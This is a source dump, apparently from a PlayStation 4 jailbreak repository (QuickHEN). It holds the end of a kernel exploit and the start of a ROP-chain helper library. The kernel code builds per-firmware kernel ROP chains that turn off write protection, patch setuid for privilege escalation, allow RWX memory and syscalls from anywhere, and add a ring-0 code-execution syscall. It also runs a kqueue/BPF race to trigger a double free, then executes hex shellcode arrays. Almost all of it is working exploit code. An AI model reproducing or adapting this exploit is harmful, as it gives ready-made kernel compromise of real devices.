353 | 			// Patch sys_setuid: add kexploit check so we don't run kexploit more than once (also doubles as privilege escalation)
354 | 			var patch_sys_setuid_offset = new int64(0xFFEE6F06, 0xFFFFFFFF);
355 | 			var patch_sys_setuid = new int64(0x000000B8, 0xC4894100);
356 | 			kpatch(patch_sys_setuid_offset, patch_sys_setuid);
357 | 			
358 | 			// Patch amd64_syscall: syscall instruction allowed anywhere
359 | 			var patch_amd64_syscall_offset1 = new int64(0xFFE92927, 0xFFFFFFFF);
360 | 			var patch_amd64_syscall_offset2 = new int64(0xFFE92945, 0xFFFFFFFF);
361 | 			var patch_amd64_syscall_1 = new int64(0x00000000, 0x40878B49);
362 | 			var patch_amd64_syscall_2 = new int64(0x90907DEB, 0x72909090);
363 | 			kpatch(patch_amd64_syscall_offset1, patch_amd64_syscall_1);
364 | 			kpatch(patch_amd64_syscall_offset2, patch_amd64_syscall_2);
365 | 			
366 | 			// Patch: sys_mmap: allow RWX mapping from anywhere
367 | 			var patch_sys_mmap_offset = new int64(0xFFFCFAB4, 0xFFFFFFFF);
368 | 			var patch_sys_mmap = new int64(0x37B64037, 0x3145C031);
369 | 			kpatch(patch_sys_mmap_offset, patch_sys_mmap);
370 | 			
371 | 			// Patch sys_dynlib_dlsym: allow dynamic resolving from anywhere
372 | 			var patch_sys_dynlib_dlsym_1 = new int64(0x0001C1E9, 0x8B489000);
373 | 			var patch_sys_dynlib_dlsym_2 = new int64(0x90C3C031, 0x90909090);
374 | 			kpatch(0xCA3CE,  patch_sys_dynlib_dlsym_1);
375 | 			kpatch(0x144AB4, patch_sys_dynlib_dlsym_2);
376 | 			
377 | 			// Patch sysent entry #11: sys_kexec() custom syscall to execute code in ring0
378 | 			var patch_sys_exec_1 = new int64(0x00F0ECB4, 0);
379 | 			var patch_sys_exec_2A = new int64(0x00F0ECBC, 0);
380 | 			var patch_sys_exec_2B = new int64(0xFFEA58F4, 0xFFFFFFFF);
381 | 			var patch_sys_exec_3 = new int64(0x00F0ECDC, 0);
382 | 			var patch_sys_exec_param1 = new int64(0x02, 0);
383 | 			var patch_sys_exec_param3 = new int64(0, 1);
384 | 			kpatch(patch_sys_exec_1, patch_sys_exec_param1);
385 | 			kpatch2(patch_sys_exec_2A, patch_sys_exec_2B);
386 | 			kpatch(patch_sys_exec_3, patch_sys_exec_param3);
387 | 			
388 | 			// Enable kernel write protection for .text
389 | 			krop.push(window.gadgets["pop rax"]);
390 | 			krop.push(kscratch.add32(0x08));
391 | 			krop.push(window.gadgets["mov rax, [rax]"]);
392 | 			krop.push(window.gadgets["pop rsi"]);
393 | 			krop.push(0x09);
394 | 			krop.push(window.gadgets["add rax, rsi"]);
395 | 			krop.push(window.gadgets["mov rdi, rax"]);
396 | 			krop.push(window.gadgets["pop rax"]);
397 | 			krop.push(kscratch.add32(0x10)); // Restore old cr0 value with WP bit set
398 | 			krop.push(window.gadgets["mov rax, [rax]"]);
399 | 			krop.push(window.gadgets["jmp rdi"]);
400 | 			
401 | 		} else if (fwFromUA == "4.74") {
402 | 			
403 | 			krop.push(window.gadgets["mov rax, [rdi]"]);
404 | 			krop.push(window.gadgets["pop rcx"]);
405 | 			krop.push(0x1E48A0); // Slide of the return ptr from kernel base
406 | 			krop.push(window.gadgets["sub rax, rcx"]);
407 | 			krop.push(window.gadgets["mov rdx, rax"]);
408 | 			krop.push(window.gadgets["pop rsi"]);
409 | 			krop.push(kscratch.add32(0x90));
410 | 			krop.push(window.gadgets["mov [rsi], rdx"]);
411 | 			
412 | 			
413 | 			krop.push(window.gadgets["pop rax"]);
414 | 			krop.push(window.gadgets["test"]);
415 | 			krop.push(window.gadgets["mov [rdi], rax"]);
416 | 			
417 | 			
418 | 			
419 | 			// Disable kernel write protection
420 | 			krop.push(window.gadgets["pop rax"])
421 | 			krop.push(kscratch.add32(0x90));
422 | 			krop.push(window.gadgets["mov rax, [rax]"]);
423 | 			krop.push(window.gadgets["pop rcx"]);
424 | 			krop.push(0x283129);
425 | 			krop.push(window.gadgets["add rax, rcx"]);
426 | 			krop.push(window.gadgets["mov rdx, rax"]);
427 | 			krop.push(window.gadgets["pop rax"]);
428 | 			krop.push(0x80040033);
429 | 			krop.push(window.gadgets["jmp rdx_more"]);
430 | 			
431 | 			// Add kexploit check so we don't run kexploit more than once (also doubles as privilege escalation)
432 | 			// E8 C8 37 13 00 41 89 C6 -> B8 00 00 00 00 41 89 C6
433 | 			var kexploit_check_patch = new int64(0x000000B8, 0xC6894100);
434 | 			krop.push(window.gadgets["pop rax"])
435 | 			krop.push(kscratch.add32(0x90));
436 | 			krop.push(window.gadgets["mov rax, [rax]"]);
437 | 			krop.push(window.gadgets["pop rcx"]);
438 | 			krop.push(0x113B73);
439 | 			krop.push(window.gadgets["add rax, rcx"]);
440 | 			krop.push(window.gadgets["pop rsi"]);
441 | 			krop.push(kexploit_check_patch);
442 | 			krop.push(window.gadgets["mov [rax], rsi"]);
443 | 			
444 | 			// Patch mprotect: Allow RWX (read-write-execute) mapping
445 | 			var mprotect_patch = new int64(0x9090EA38, 0x90909090);
446 | 			krop.push(window.gadgets["pop rax"])
447 | 			krop.push(kscratch.add32(0x90));
448 | 			krop.push(window.gadgets["mov rax, [rax]"]);
449 | 			krop.push(window.gadgets["pop rcx"]);
450 | 			krop.push(0x397876);
451 | 			krop.push(window.gadgets["add rax, rcx"]);
452 | 			krop.push(window.gadgets["pop rsi"]);
453 | 			krop.push(mprotect_patch);
454 | 			krop.push(window.gadgets["mov [rax], rsi"]);
455 | 			
456 | 			// Patch sys_mmap: Allow RWX (read-write-execute) mapping
457 | 			var kernel_mmap_patch = new int64(0x37b64137, 0x3145c031);
458 | 			krop.push(window.gadgets["pop rax"])
459 | 			krop.push(kscratch.add32(0x90));
460 | 			krop.push(window.gadgets["mov rax, [rax]"]);
461 | 			krop.push(window.gadgets["pop rcx"]);
462 | 			krop.push(0x1413A4);
463 | 			krop.push(window.gadgets["add rax, rcx"]);
464 | 			krop.push(window.gadgets["pop rsi"]);
465 | 			krop.push(kernel_mmap_patch);
466 | 			krop.push(window.gadgets["mov [rax], rsi"]);
467 | 			
468 | 			// Patch syscall: syscall instruction allowed anywhere
469 | 			var kernel_syscall_patch1 = new int64(0x00000000, 0x40878b49);
470 | 			var kernel_syscall_patch2 = new int64(0x909079eb, 0x72909090);
471 | 			krop.push(window.gadgets["pop rax"])
472 | 			krop.push(kscratch.add32(0x90));
473 | 			krop.push(window.gadgets["mov rax, [rax]"]);
474 | 			krop.push(window.gadgets["pop rcx"]);
475 | 			krop.push(0x3DD4B3);
476 | 			krop.push(window.gadgets["add rax, rcx"]);
477 | 			krop.push(window.gadgets["pop rsi"]);
478 | 			krop.push(kernel_syscall_patch1);
479 | 			krop.push(window.gadgets["mov [rax], rsi"]);
480 | 			krop.push(window.gadgets["pop rax"])
481 | 			krop.push(kscratch.add32(0x90));
482 | 			krop.push(window.gadgets["mov rax, [rax]"]);
483 | 			krop.push(window.gadgets["pop rcx"]);
484 | 			krop.push(0x3DD4D1);
485 | 			krop.push(window.gadgets["add rax, rcx"]);
486 | 			krop.push(window.gadgets["pop rsi"]);
487 | 			krop.push(kernel_syscall_patch2);
488 | 			krop.push(window.gadgets["mov [rax], rsi"]);
489 | 			
490 | 			// Patch sys_dynlib_dlsym: Allow from anywhere
491 | 			var kernel_dlsym_patch1 = new int64(0x000352E9, 0x8B489000);
492 | 			var kernel_dlsym_patch2 = new int64(0x90C3C031, 0x90909090);
493 | 			krop.push(window.gadgets["pop rax"])
494 | 			krop.push(kscratch.add32(0x90));
495 | 			krop.push(window.gadgets["mov rax, [rax]"]);
496 | 			krop.push(window.gadgets["pop rcx"]);
497 | 			krop.push(0x3D05AE);
498 | 			krop.push(window.gadgets["add rax, rcx"]);
499 | 			krop.push(window.gadgets["pop rsi"]);
500 | 			krop.push(kernel_dlsym_patch1);
501 | 			krop.push(window.gadgets["mov [rax], rsi"]);
502 | 			krop.push(window.gadgets["pop rax"])
503 | 			krop.push(kscratch.add32(0x90));
504 | 			krop.push(window.gadgets["mov rax, [rax]"]);
505 | 			krop.push(window.gadgets["pop rcx"]);
506 | 			krop.push(0x686A0);
507 | 			krop.push(window.gadgets["add rax, rcx"]);
508 | 			krop.push(window.gadgets["pop rsi"]);
509 | 			krop.push(kernel_dlsym_patch2);
510 | 			krop.push(window.gadgets["mov [rax], rsi"]);
511 | 			
512 | 			// Add custom sys_exec() call to execute arbitrary code as kernel
513 | 			var kernel_exec_param = new int64(0, 1);
514 | 			krop.push(window.gadgets["pop rax"])
515 | 			krop.push(kscratch.add32(0x90));
516 | 			krop.push(window.gadgets["mov rax, [rax]"]);
517 | 			krop.push(window.gadgets["pop rcx"]);
518 | 			krop.push(0x10349A0);
519 | 			krop.push(window.gadgets["add rax, rcx"]);
520 | 			krop.push(window.gadgets["pop rsi"]);
521 | 			krop.push(0x02);
522 | 			krop.push(window.gadgets["mov [rax], rsi"]);
523 | 			krop.push(window.gadgets["pop rsi"])
524 | 			krop.push(0x139A2F); // jmp qword ptr [rsi],done
525 | 			krop.push(window.gadgets["pop rdi"])
526 | 			krop.push(kscratch.add32(0x90));
527 | 			krop.push(window.gadgets["add rsi, [rdi]; mov rax, rsi"]);
528 | 			krop.push(window.gadgets["pop rax"])
529 | 			krop.push(kscratch.add32(0x90));
530 | 			krop.push(window.gadgets["mov rax, [rax]"]);
531 | 			krop.push(window.gadgets["pop rcx"]);
532 | 			krop.push(0x10349A8);
533 | 			krop.push(window.gadgets["add rax, rcx"]);
534 | 			krop.push(window.gadgets["mov [rax], rsi"]);
535 | 			krop.push(window.gadgets["pop rax"])
536 | 			krop.push(kscratch.add32(0x90));
537 | 			krop.push(window.gadgets["mov rax, [rax]"]);
538 | 			krop.push(window.gadgets["pop rcx"]);
539 | 			krop.push(0x10349C8);
540 | 			krop.push(window.gadgets["add rax, rcx"]);
541 | 			krop.push(window.gadgets["pop rsi"]);
542 | 			krop.push(kernel_exec_param);
543 | 			krop.push(window.gadgets["mov [rax], rsi"]);
544 | 			
545 | 			// Enable kernel write protection
546 | 			krop.push(window.gadgets["pop rax"])
547 | 			krop.push(kscratch.add32(0x90));
548 | 			krop.push(window.gadgets["mov rax, [rax]"]);
549 | 			krop.push(window.gadgets["pop rcx"]);
550 | 			krop.push(0x283120);
551 | 			krop.push(window.gadgets["add rax, rcx"]);
552 | 			krop.push(window.gadgets["jmp rax"]);
553 | 			
554 | 			krop.push(window.gadgets["pop rdi"]); // save address in usermode
555 | 			krop.push(kscratch);
556 | 			krop.push(window.gadgets["mov [rdi], rax"]);
557 | 			
558 | 		} else if (fwFromUA == "4.55") {
559 | 			
560 | 			krop.push(window.gadgets["mov rax, [rdi]"]);
561 | 			krop.push(window.gadgets["pop rcx"]);
562 | 			krop.push(0x1E2640); // Slide of the return ptr from kernel base
563 | 			krop.push(window.gadgets["sub rax, rcx"]);
564 | 			krop.push(window.gadgets["mov rdx, rax"]);
565 | 			krop.push(window.gadgets["pop rsi"]);
566 | 			krop.push(kscratch.add32(0x90));
567 | 			krop.push(window.gadgets["mov [rsi], rdx"]);
568 | 			
569 | 			
570 | 			krop.push(window.gadgets["pop rax"]);
571 | 			krop.push(window.gadgets["test"]);
572 | 			krop.push(window.gadgets["mov [rdi], rax"]);
573 | 			
574 | 			
575 | 			
576 | 			// Disable kernel write protection
577 | 			krop.push(window.gadgets["pop rax"])
578 | 			krop.push(kscratch.add32(0x90));
579 | 			krop.push(window.gadgets["mov rax, [rax]"]);
580 | 			krop.push(window.gadgets["pop rcx"]);
581 | 			krop.push(0x280f79);
582 | 			krop.push(window.gadgets["add rax, rcx"]);
583 | 			krop.push(window.gadgets["mov rdx, rax"]);
584 | 			krop.push(window.gadgets["pop rax"]);
585 | 			krop.push(0x80040033);
586 | 			krop.push(window.gadgets["jmp rdx_more"]);
587 | 			
588 | 			// Add kexploit check so we don't run kexploit more than once (also doubles as privilege escalation)
589 | 			// E8 C8 37 13 00 41 89 C6 -> B8 00 00 00 00 41 89 C6
590 | 			var kexploit_check_patch = new int64(0x000000B8, 0xC6894100);
591 | 			krop.push(window.gadgets["pop rax"])
592 | 			krop.push(kscratch.add32(0x90));
593 | 			krop.push(window.gadgets["mov rax, [rax]"]);
594 | 			krop.push(window.gadgets["pop rcx"]);
595 | 			krop.push(0x1144E3);
596 | 			krop.push(window.gadgets["add rax, rcx"]);
597 | 			krop.push(window.gadgets["pop rsi"]);
598 | 			krop.push(kexploit_check_patch);
599 | 			krop.push(window.gadgets["mov [rax], rsi"]);
600 | 			
601 | 			// Patch mprotect: Allow RWX (read-write-execute) mapping
602 | 			var mprotect_patch = new int64(0x9090EA38, 0x90909090);
603 | 			krop.push(window.gadgets["pop rax"])
604 | 			krop.push(kscratch.add32(0x90));
605 | 			krop.push(window.gadgets["mov rax, [rax]"]);
606 | 			krop.push(window.gadgets["pop rcx"]);
607 | 			krop.push(0x396A56);
608 | 			krop.push(window.gadgets["add rax, rcx"]);
609 | 			krop.push(window.gadgets["pop rsi"]);
610 | 			krop.push(mprotect_patch);
611 | 			krop.push(window.gadgets["mov [rax], rsi"]);
612 | 			
613 | 			// Patch sys_mmap: Allow RWX (read-write-execute) mapping
614 | 			var kernel_mmap_patch = new int64(0x37b64137, 0x3145c031);
615 | 			krop.push(window.gadgets["pop rax"])
616 | 			krop.push(kscratch.add32(0x90));
617 | 			krop.push(window.gadgets["mov rax, [rax]"]);
618 | 			krop.push(window.gadgets["pop rcx"]);
619 | 			krop.push(0x141D14);
620 | 			krop.push(window.gadgets["add rax, rcx"]);
621 | 			krop.push(window.gadgets["pop rsi"]);
622 | 			krop.push(kernel_mmap_patch);
623 | 			krop.push(window.gadgets["mov [rax], rsi"]);
624 | 			
625 | 			// Patch syscall: syscall instruction allowed anywhere
626 | 			var kernel_syscall_patch1 = new int64(0x00000000, 0x40878b49);
627 | 			var kernel_syscall_patch2 = new int64(0x909079eb, 0x72909090);
628 | 			krop.push(window.gadgets["pop rax"])
629 | 			krop.push(kscratch.add32(0x90));
630 | 			krop.push(window.gadgets["mov rax, [rax]"]);
631 | 			krop.push(window.gadgets["pop rcx"]);
632 | 			krop.push(0x3DC603);
633 | 			krop.push(window.gadgets["add rax, rcx"]);
634 | 			krop.push(window.gadgets["pop rsi"]);
635 | 			krop.push(kernel_syscall_patch1);
636 | 			krop.push(window.gadgets["mov [rax], rsi"]);
637 | 			krop.push(window.gadgets["pop rax"])
638 | 			krop.push(kscratch.add32(0x90));
639 | 			krop.push(window.gadgets["mov rax, [rax]"]);
640 | 			krop.push(window.gadgets["pop rcx"]);
641 | 			krop.push(0x3DC621);
642 | 			krop.push(window.gadgets["add rax, rcx"]);
643 | 			krop.push(window.gadgets["pop rsi"]);
644 | 			krop.push(kernel_syscall_patch2);
645 | 			krop.push(window.gadgets["mov [rax], rsi"]);
646 | 			
647 | 			// Patch sys_dynlib_dlsym: Allow from anywhere
648 | 			var kernel_dlsym_patch1 = new int64(0x000352E9, 0x8B489000);
649 | 			var kernel_dlsym_patch2 = new int64(0x90C3C031, 0x90909090);
650 | 			krop.push(window.gadgets["pop rax"])
651 | 			krop.push(kscratch.add32(0x90));
652 | 			krop.push(window.gadgets["mov rax, [rax]"]);
653 | 			krop.push(window.gadgets["pop rcx"]);
654 | 			krop.push(0x3CF6FE);
655 | 			krop.push(window.gadgets["add rax, rcx"]);
656 | 			krop.push(window.gadgets["pop rsi"]);
657 | 			krop.push(kernel_dlsym_patch1);
658 | 			krop.push(window.gadgets["mov [rax], rsi"]);
659 | 			krop.push(window.gadgets["pop rax"])
660 | 			krop.push(kscratch.add32(0x90));
661 | 			krop.push(window.gadgets["mov rax, [rax]"]);
662 | 			krop.push(window.gadgets["pop rcx"]);
663 | 			krop.push(0x690C0);
664 | 			krop.push(window.gadgets["add rax, rcx"]);
665 | 			krop.push(window.gadgets["pop rsi"]);
666 | 			krop.push(kernel_dlsym_patch2);
667 | 			krop.push(window.gadgets["mov [rax], rsi"]);
668 | 			
669 | 			// Add custom sys_exec() call to execute arbitrary code as kernel
670 | 			var kernel_exec_param = new int64(0, 1);
671 | 			krop.push(window.gadgets["pop rax"])
672 | 			krop.push(kscratch.add32(0x90));
673 | 			krop.push(window.gadgets["mov rax, [rax]"]);
674 | 			krop.push(window.gadgets["pop rcx"]);
675 | 			krop.push(0x102b8a0);
676 | 			krop.push(window.gadgets["add rax, rcx"]);
677 | 			krop.push(window.gadgets["pop rsi"]);
678 | 			krop.push(0x02);
679 | 			krop.push(window.gadgets["mov [rax], rsi"]);
680 | 			krop.push(window.gadgets["pop rsi"])
681 | 			krop.push(0x13a39f); // jmp qword ptr [rsi],done
682 | 			krop.push(window.gadgets["pop rdi"])
683 | 			krop.push(kscratch.add32(0x90));
684 | 			krop.push(window.gadgets["add rsi, [rdi]; mov rax, rsi"]);
685 | 			krop.push(window.gadgets["pop rax"])
686 | 			krop.push(kscratch.add32(0x90));
687 | 			krop.push(window.gadgets["mov rax, [rax]"]);
688 | 			krop.push(window.gadgets["pop rcx"]);
689 | 			krop.push(0x102b8a8);
690 | 			krop.push(window.gadgets["add rax, rcx"]);
691 | 			krop.push(window.gadgets["mov [rax], rsi"]);
692 | 			krop.push(window.gadgets["pop rax"])
693 | 			krop.push(kscratch.add32(0x90));
694 | 			krop.push(window.gadgets["mov rax, [rax]"]);
695 | 			krop.push(window.gadgets["pop rcx"]);
696 | 			krop.push(0x102b8c8);
697 | 			krop.push(window.gadgets["add rax, rcx"]);
698 | 			krop.push(window.gadgets["pop rsi"]);
699 | 			krop.push(kernel_exec_param);
700 | 			krop.push(window.gadgets["mov [rax], rsi"]);
701 | 			
702 | 			// Enable kernel write protection
703 | 			krop.push(window.gadgets["pop rax"])
704 | 			krop.push(kscratch.add32(0x90));
705 | 			krop.push(window.gadgets["mov rax, [rax]"]);
706 | 			krop.push(window.gadgets["pop rcx"]);
707 | 			krop.push(0x280f70);
708 | 			krop.push(window.gadgets["add rax, rcx"]);
709 | 			krop.push(window.gadgets["jmp rax"]);
710 | 			
711 | 			krop.push(window.gadgets["pop rdi"]); // save address in usermode
712 | 			krop.push(kscratch);
713 | 			krop.push(window.gadgets["mov [rdi], rax"]);
714 | 			
715 | 		}
716 | 		
717 | 		krop.push(window.gadgets["ret2userland"]);
718 | 		krop.push(kscratch.add32(0x1000));
719 | 		
720 | 		// END OF KROP
721 | 		
722 | 		var kq = p.malloc32(0x10);
723 | 		var kev = p.malloc32(0x100);
724 | 		kev.backing[0] = sock;
725 | 		kev.backing[2] = 0x1ffff;
726 | 		kev.backing[3] = 1;
727 | 		kev.backing[4] = 5;
728 | 		
729 | 		// Shellcode to clean up memory
730 | 		if (fwFromUA == "5.01") {
731 | 			var shcode = [0x00008BE9, 0x90909000, 0x90909090, 0x90909090, 0x0082B955, 0x8948C000, 0x415641E5, 0x53544155, 0x8949320F, 0xBBC089D4, 0x00000100, 0x20E4C149, 0x48C40949, 0x0096058D, 0x8D490000, 0xFE402494, 0x8D4DFFFF, 0xDF8024B4, 0x8D4D0010, 0x5AB024AC, 0x81490043, 0x4B7160C4, 0x10894801, 0x00401F0F, 0x000002BA, 0xE6894C00, 0x000800BF, 0xD6FF4100, 0x393D8D48, 0x48000000, 0xC031C689, 0x83D5FF41, 0xDC7501EB, 0x41C0315B, 0x415D415C, 0x90C35D5E, 0x3D8D4855, 0xFFFFFF78, 0x8948F631, 0x00E95DE5, 0x48000000, 0x000BC0C7, 0x89490000, 0xC3050FCA, 0x6C616D6B, 0x3A636F6C, 0x25783020, 0x6C363130, 0x00000A58, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000];
732 | 		} else if (fwFromUA == "5.05") {
733 | 			var shcode = [0x00008BE9, 0x90909000, 0x90909090, 0x90909090, 0x0082B955, 0x8948C000, 0x415641E5, 0x53544155, 0x8949320F, 0xBBC089D4, 0x00000100, 0x20E4C149, 0x48C40949, 0x0096058D, 0x8D490000, 0xFE402494, 0x8D4DFFFF, 0xE09024B4, 0x8D4D0010, 0x5E8024AC, 0x81490043, 0x4B7160C4, 0x10894801, 0x00401F0F, 0x000002BA, 0xE6894C00, 0x000800BF, 0xD6FF4100, 0x393D8D48, 0x48000000, 0xC031C689, 0x83D5FF41, 0xDC7501EB, 0x41C0315B, 0x415D415C, 0x90C35D5E, 0x3D8D4855, 0xFFFFFF78, 0x8948F631, 0x00E95DE5, 0x48000000, 0x000BC0C7, 0x89490000, 0xC3050FCA, 0x6C616D6B, 0x3A636F6C, 0x25783020, 0x6C363130, 0x00000A58, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000];
734 | 		} else if (fwFromUA == "4.74") {
735 | 			var shcode = [0x00008be9, 0x90909000, 0x90909090, 0x90909090, 0x0082b955, 0x8948c000, 0x415641e5, 0x53544155, 0x8949320f, 0xbbc089d4, 0x00000100, 0x20e4c149, 0x48c40949, 0x0096058d, 0x8d490000, 0x48302494, 0x8d4dffcf, 0xcdf024b4, 0x8d4d000e, 0xc76024ac, 0x8149ffd0, 0x660570c4, 0x10894801, 0x00401f0f, 0x000002ba, 0xe6894c00, 0x000800bf, 0xd6ff4100, 0x393d8d48, 0x48000000, 0xc031c689, 0x83d5ff41, 0xdc7501eb, 0x41c0315b, 0x415d415c, 0x90c35d5e, 0x3d8d4855, 0xffffff78, 0x8948f631, 0x00e95de5, 0x48000000, 0x000bc0c7, 0x89490000, 0xc3050fca, 0x6c616d6b, 0x3a636f6c, 0x25783020, 0x6c363130, 0x00000a58, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000];
736 | 		} else if (fwFromUA == "4.55") {
737 | 			var shcode = [0x00008BE9, 0x90909000, 0x90909090, 0x90909090, 0x0082B955, 0x8948C000, 0x415641E5, 0x53544155, 0x8949320F, 0xBBC089D4, 0x00000100, 0x20E4C149, 0x48C40949, 0x0096058D, 0x8D490000, 0x6A302494, 0x8D4DFFCF, 0xE18024B4, 0x8D4D000E, 0xE96024AC, 0x8149FFD0, 0x65A680C4, 0x10894801, 0x00401F0F, 0x000002BA, 0xE6894C00, 0x000800BF, 0xD6FF4100, 0x393D8D48, 0x48000000, 0xC031C689, 0x83D5FF41, 0xDC7501EB, 0x41C0315B, 0x415D415C, 0x90C35D5E, 0x3D8D4855, 0xFFFFFF78, 0x8948F631, 0x00E95DE5, 0x48000000, 0x000BC0C7, 0x89490000, 0xC3050FCA, 0x6C616D6B, 0x3A636F6C, 0x25783020, 0x6C363130, 0x00000A58, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, ];
738 | 		}
739 | 		
740 | 		var shellbuf = p.malloc32(0x1000);
741 | 		for (var i = 0; i < shcode.length; i++)
742 | 			shellbuf.backing[i] = shcode[i];
743 | 		
744 | 		// RACE!
745 | 		var race = new rop();
746 | 		start1();
747 | 		while (1) {
748 | 			race.count = 0;
749 | 			
750 | 			// Create a kqueue
751 | 			race.push(window.syscalls[362]);
752 | 			race.push(window.gadgets["pop rdi"]);
753 | 			race.push(kq);
754 | 			race.push(window.gadgets["mov [rdi], rax"]);
755 | 			
756 | 			// Race against the other thread
757 | 			race.push(window.gadgets["ret"]);
758 | 			race.push(window.gadgets["ret"]);
759 | 			race.push(window.gadgets["ret"]);
760 | 			race.push(window.gadgets["ret"]);
761 | 			race.push_write8(loop1, interrupt1);
762 | 			race.push(window.gadgets["pop rdi"]);
763 | 			race.push(fd);
764 | 			race.push(window.gadgets["pop rsi"]);
765 | 			race.push(0x8010427B);
766 | 			race.push(window.gadgets["pop rdx"]);
767 | 			race.push(bpf_valid_prog);
768 | 			race.push(window.syscalls[54]);
769 | 			
770 | 			// Attempt to trigger double free()
771 | 			race.push(window.gadgets["pop rax"]);
772 | 			race.push(kq);
773 | 			race.push(window.gadgets["mov rax, [rax]"]);
774 | 			race.push(window.gadgets["pop rdi"]);
775 | 			race.push(0);
776 | 			race.push(window.gadgets["add rdi, rax"]);
777 | 			race.push(window.gadgets["pop rsi"]);
778 | 			race.push(kev);
779 | 			race.push(window.gadgets["pop rdx"]);
780 | 			race.push(1);
781 | 			race.push(window.gadgets["pop rcx"]);
782 | 			race.push(0);
783 | 			race.push(window.gadgets["pop r8"]);
784 | 			race.push(0);
785 | 			race.push(window.syscalls[363]);
786 | 			
787 | 			// Spray via ioctl
788 | 			race.push(window.gadgets["pop rdi"]);
789 | 			race.push(fd1);
790 | 			race.push(window.gadgets["pop rsi"]);
791 | 			race.push(0x8010427B);
792 | 			race.push(window.gadgets["pop rdx"]);
793 | 			race.push(bpf_spray_prog);
794 | 			race.push(window.syscalls[54]);
795 | 			
796 | 			// Close the poisoned kqueue and run the kROP chain!
797 | 			race.push(window.gadgets["pop rax"]);
798 | 			race.push(kq);
799 | 			race.push(window.gadgets["mov rax, [rax]"]);
800 | 			race.push(window.gadgets["pop rdi"]);
801 | 			race.push(0);
802 | 			race.push(window.gadgets["add rdi, rax"]);
803 | 			race.push(window.syscalls[6]);
804 | 			
805 | 			// alert("Gotta go fast!"); // for kexploit debugging
806 | 			race.run();
807 | 			
808 | 			if (kscratch.backing[0] != 0) {
809 | 				
810 | 				// Clean up memory
811 | 				p.syscall("sys_mprotect", shellbuf, 0x4000, 7);
812 | 				p.fcall(shellbuf);
813 | 				
814 | 				return true;
815 | 			}
816 | 		}
817 | 	} catch(ex) {
818 | 		fail(ex)
819 | 	}
820 | 	
821 | 	// failed (should never go here)
822 | 	return false;
823 | }


--------------------------------------------------------------------------------
/QuickHEN/offline.manifest:
--------------------------------------------------------------------------------
 1 | CACHE MANIFEST
 2 | 
 3 | index.html
 4 | expl.js
 5 | rop.js
 6 | syscalls.js
 7 | userland.js
 8 | kernel.js
 9 | kdumper.bin
10 | unblocker.bin
11 | ps4-hen-vtx-455.bin
12 | ps4-hen-vtx-505.bin
13 | fake_installer.bin
14 | 
15 | FALLBACK:
16 | . offline.html


--------------------------------------------------------------------------------
/QuickHEN/ps4-hen-vtx-455.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TeamFAPS/PS4-Exploits/eaee94c568130de1b866c4b55811acf7219974f5/QuickHEN/ps4-hen-vtx-455.bin


--------------------------------------------------------------------------------
/QuickHEN/ps4-hen-vtx-505.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TeamFAPS/PS4-Exploits/eaee94c568130de1b866c4b55811acf7219974f5/QuickHEN/ps4-hen-vtx-505.bin


--------------------------------------------------------------------------------
/QuickHEN/rop.js:
--------------------------------------------------------------------------------
  1 | // Basic memory functions
  2 | function malloc(size)
  3 | {
  4 |   var backing = new Uint8Array(0x10000 + size);
  5 | 
  6 |   window.nogc.push(backing);
  7 | 
  8 |   var ptr     = p.read8(p.leakval(backing).add32(0x10));
  9 |   ptr.backing = backing;
 10 | 
 11 |   return ptr;
 12 | }
 13 | 
 14 | function mallocu32(size) {
 15 |   var backing = new Uint8Array(0x10000 + size * 4);
 16 | 
 17 |   window.nogc.push(backing);
 18 | 
 19 |   var ptr     = p.read8(p.leakval(backing).add32(0x10));
 20 |   ptr.backing = new Uint32Array(backing.buffer);
 21 | 
 22 |   return ptr;
 23 | }
 24 | 
 25 | function stringify(str)
 26 | {
 27 |   var bufView = new Uint8Array(str.length + 1);
 28 | 
 29 |   for(var i=0; i < str.length; i++) {
 30 |       bufView[i] = str.charCodeAt(i) & 0xFF;
 31 |   }
 32 | 
 33 |   window.nogc.push(bufView);
 34 |   return p.read8(p.leakval(bufView).add32(0x10));
 35 | }
 36 | 
 37 | // Class for quickly creating a kernel ROP chain
 38 | var krop = function (p, addr) {
 39 |   // Contains base and stack pointer for fake stack (this.stackBase = RBP, this.stackPointer = RSP)
 40 |   this.stackBase    = addr;
 41 |   this.stackPointer = 0;
 42 | 
 43 |   // Push instruction / value onto fake stack
 44 |   this.push = function (val) {
 45 |     p.write8(this.stackBase.add32(this.stackPointer), val);
 46 |     this.stackPointer += 8;
 47 |   };
 48 | 
 49 |   // Write to address with value (helper function)
 50 |   this.write64 = function (addr, val) {
 51 |     this.push(window.gadgets["pop rdi"]);
 52 |     this.push(addr);
 53 |     this.push(window.gadgets["pop rax"]);
 54 |     this.push(val);
 55 |     this.push(window.gadgets["mov [rdi], rax"]);
 56 |   }
 57 | 
 58 |   // Return krop object
 59 |   return this;
 60 | };
 61 | 
 62 | // Class for quickly creating and managing a ROP chain
 63 | window.rop = function() {
 64 |   this.stack        = new Uint32Array(0x10000);
 65 |   this.stackBase    = p.read8(p.leakval(this.stack).add32(0x10));
 66 |   this.count        = 0;
 67 | 
 68 |   this.clear = function() {
 69 |     this.count   = 0;
 70 |     this.runtime = undefined;
 71 | 
 72 |     for(var i = 0; i < 0xFF0 / 2; i++)
 73 |     {
 74 |       p.write8(this.stackBase.add32(i*8), 0);
 75 |     }
 76 |   };
 77 | 
 78 |   this.pushSymbolic = function() {
 79 |     this.count++;
 80 |     return this.count-1;
 81 |   }
 82 | 
 83 |   this.finalizeSymbolic = function(idx, val) {
 84 |     p.write8(this.stackBase.add32(idx * 8), val);
 85 |   }
 86 | 
 87 |   this.push = function(val) {
 88 |     this.finalizeSymbolic(this.pushSymbolic(), val);
 89 |   }
 90 | 
 91 |   this.push_write8 = function(where, what)
 92 |   {
